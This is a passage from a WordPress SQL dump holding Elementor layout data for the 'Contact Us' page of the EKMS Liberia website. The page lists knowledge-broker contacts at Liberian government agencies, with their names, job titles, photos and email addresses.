emplate_type','wp-page'),(24380,3592,'_elementor_version','3.0.16'),(24381,3592,'_wp_page_template','default');
INSERT INTO `wp_postmeta` VALUES (24382,3592,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a 